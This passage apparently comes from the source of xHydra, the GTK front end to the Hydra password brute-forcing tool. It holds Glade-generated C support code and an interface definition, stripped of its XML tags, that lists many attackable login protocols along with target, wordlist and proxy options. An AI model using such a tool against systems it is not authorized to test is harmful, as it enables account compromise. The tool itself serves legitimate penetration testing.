g_strdup_printf(\"%s%s%s\", (gchar *)elem->data, G_DIR_SEPARATOR_S, filename);\n\n if (g_file_test(pathname, G_FILE_TEST_EXISTS))\n return pathname;\n g_free(pathname);\n elem = elem->next;\n }\n return NULL;\n}\n\n/* This is an internally used function to create pixmaps. */\nGtkWidget *create_pixmap(GtkWidget *widget, const gchar *filename) {\n gchar *pathname = NULL;\n GtkWidget *pixmap;\n\n if (!filename || !filename[0])\n return gtk_image_new();\n\n pathname = find_pixmap_file(filename);\n\n if (!pathname) {\n g_warning(\"Couldn't find pixmap file: %s\", filename);\n return gtk_image_new();\n }\n\n pixmap = gtk_image_new_from_file(pathname);\n g_free(pathname);\n return pixmap;\n}\n\n/* This is an internally used function to create pixmaps. */\nGdkPixbuf *create_pixbuf(const gchar *filename) {\n gchar *pathname = NULL;\n GdkPixbuf *pixbuf;\n GError *error = NULL;\n\n if (!filename || !filename[0])\n return NULL;\n\n pathname = find_pixmap_file(filename);\n\n if (!pathname) {\n g_warning(\"Couldn't find pixmap file: %s\", filename);\n return NULL;\n }\n\n pixbuf = gdk_pixbuf_new_from_file(pathname, &error);\n if (!pixbuf) {\n fprintf(stderr, \"Failed to load pixbuf file: %s: %s\\n\", pathname, error->message);\n g_error_free(error);\n }\n g_free(pathname);\n return pixbuf;\n}\n\n/* This is used to set ATK action descriptions. */\nvoid glade_set_atk_action_description(AtkAction *action, const gchar *action_name, const gchar *description) {\n gint n_actions, i;\n\n n_actions = atk_action_get_n_actions(action);\n for (i = 0; i < n_actions; i++) {\n if (!strcmp(atk_action_get_name(action, i), action_name))\n atk_action_set_description(action, i, description);\n }\n}\n" }, { "path": "hydra-gtk/src/support.h", "content": "\n/*\n * DO NOT EDIT THIS FILE - it is generated by Glade.\n */\n\n#ifdef HAVE_CONFIG_H\n#include \n#endif\n\n#include \n\n/*\n * Public Functions.\n */\n\n/*\n * This function returns a widget in a component created by Glade.\n * Call it with the toplevel widget in the component (i.e. a window/dialog),\n * or alternatively any widget in the component, and the name of the widget\n * you want returned.\n */\nGtkWidget *lookup_widget(GtkWidget *widget, const gchar *widget_name);\n\n/* Use this function to set the directory containing installed pixmaps. */\nvoid add_pixmap_directory(const gchar *directory);\n\n/*\n * Private Functions.\n */\n\n/* This is used to create the pixmaps used in the interface. */\nGtkWidget *create_pixmap(GtkWidget *widget, const gchar *filename);\n\n/* This is used to create the pixbufs used in the interface. */\nGdkPixbuf *create_pixbuf(const gchar *filename);\n\n/* This is used to set ATK action descriptions. */\nvoid glade_set_atk_action_description(AtkAction *action, const gchar *action_name, const gchar *description);\n\nextern GtkWidget *wndMain;\nextern char *HYDRA_BIN;\nextern guint message_id;\n" }, { "path": "hydra-gtk/xhydra.glade", "content": " \n\n\n\n\n\n True\n HydraGTK\n GTK_WINDOW_TOPLEVEL\n GTK_WIN_POS_NONE\n False\n True\n False\n True\n False\n False\n GDK_WINDOW_TYPE_HINT_NORMAL\n GDK_GRAVITY_NORTH_WEST\n \n\n \n \n True\n False\n 0\n\n \n\t\n\t True\n\n\t \n\t \n\t True\n\t gtk-quit\n\t True\n\t \n\t \n\t \n\t\n\t\n\t 0\n\t False\n\t False\n\t\n \n\n \n\t\n\t True\n\t True\n\t True\n\t True\n\t GTK_POS_TOP\n\t False\n\t False\n\n\t \n\t \n\t True\n\t False\n\t 0\n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 5\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t False\n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t The protocol to use for the login/password cracking attempt\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t \n\t\t\t \n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t GTK_SELECTION_BROWSE\n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t cisco\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t cisco-enable\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t cvs\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t firebird\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ftp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-head\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-get\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-form-get\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-form-post\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-proxy\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t https-head\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t https-get\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t icq\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t imap\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ldap2\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ldap3\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t mysql\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ncp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t nntp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t pcnfs\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t pop3\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t postgres\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t pcanywhere\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t vmauthd\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rexec\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rlogin\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rsh\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t sapr3\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t sip\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t smb\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t smtp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t snmp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t socks5\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ssh2\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t svn\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t teamspeak\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t telnet\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t vnc\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t sshkey\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t s7-300\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t \n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t afp\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ftps\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-get-form\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-post-form\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t http-proxy-url\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t https-get-form\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t https-post-form\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t irc\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ldap3-crammd5\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ldap3-digestmd5\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t mssql\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t oracle\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t oracle-sid\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t oracle-listener\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rdp\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t ssh\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t xmpp\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t adam6500\n\t\t\t\t\n\t\t\t \n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rpcap\n\t\t\t\t\n\t\t\t \n\t\t\t\t\n\t\t\t\t True\n\t\t\t\t True\n\t\t\t\t rtsp\n\t\t\t\t\n\t\t\t \n\n\t\t\t \n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 4\n\t\t\t 5\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Protocol\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 4\n\t\t\t 5\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t select the port on which the daemon you want to brute force runs, 0 means default\n\t\t\t True\n\t\t\t 1\n\t\t\t 0\n\t\t\t False\n\t\t\t GTK_UPDATE_ALWAYS\n\t\t\t False\n\t\t\t False\n\t\t\t 0 0 100 1 10 10\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 3\n\t\t\t 4\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Port\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 2\n\t\t\t 4\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t True\n\t\t\t Prefer IPV6\n\t\t\t True\n\t\t\t Use IPV6\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 2\n\t\t\t 2\n\t\t\t 3\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Target List\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t A file which contains the targets to attack. One entry per line. IP\naddresses and/or DNS names.\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The target to attack - DNS name or IP address\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t 127.0.0.1\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Single Target\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t radioTarget2\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Target\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 2\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t be verbose\n\t\t\t True\n\t\t\t Be Verbose\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Enable debug mode\n\t\t\t True\n\t\t\t Debug\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Show attempts\n\t\t\t True\n\t\t\t Show Attempts\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Enable to use SSL (the target must have SSL enabled!\n\t\t\t True\n\t\t\t Use SSL\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Output Options\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\t \n\t \n\t False\n\t True\n\t \n\t \n\n\t \n\t \n\t True\n\t Target\n\t False\n\t False\n\t GTK_JUSTIFY_LEFT\n\t False\n\t False\n\t 0.5\n\t 0.5\n\t 0\n\t 0\n\t \n\t \n\t tab\n\t \n\t \n\n\t \n\t \n\t True\n\t False\n\t 0\n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 2\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t File with user logins, one entry per line\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The login to use\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t yourname\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Username\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Username List\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioUsername1\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Username\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 2\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t File with passwords to try, one entry per line\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The password to try\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t yourpass\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Password\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Password List\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioPass1\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand|shrink\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Password\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 1\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t "Enable this option to use a colon file for login/password attempts\n\t\t\t True\n\t\t\t Use Colon separated file\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The colon file to use, each line has to be structured like "mylogin:mypass"\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Colon separated file\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 1\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t \n\t\t True\n\t\t Enable this option to try the login as password, in addition to the password/file\n\t\t True\n\t\t Try login as password\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t False\n\t\t False\n\t\t True\n\t\t \n\t\t \n\t\t 0\n\t\t 1\n\t\t 0\n\t\t 1\n\t\t expand|shrink\n\t\t expand\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Enable this option to try an empty password, in addition to the password/file\n\t\t True\n\t\t Try empty password\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t False\n\t\t False\n\t\t True\n\t\t \n\t\t \n\t\t 1\n\t\t 2\n\t\t 0\n\t\t 1\n\t\t expand|shrink\n\t\t expand\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\t \n\t \n\t False\n\t True\n\t \n\t \n\n\t \n\t \n\t True\n\t Passwords\n\t False\n\t False\n\t GTK_JUSTIFY_LEFT\n\t False\n\t False\n\t 0.5\n\t 0.5\n\t 0\n\t 0\n\t \n\t \n\t tab\n\t \n\t \n\n\t \n\t \n\t True\n\t 2\n\t 1\n\t False\n\t 0\n\t 0\n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 5\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Proxy \n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The address of the proxy. Syntax: "http://123.45.67.89:8080"\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t http://127.0.0.1:8080\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Enable this if the proxy requires authenticatio\n\t\t\t True\n\t\t\t Proxy needs authentication\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 2\n\t\t\t 3\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Username\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 3\n\t\t\t 4\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t 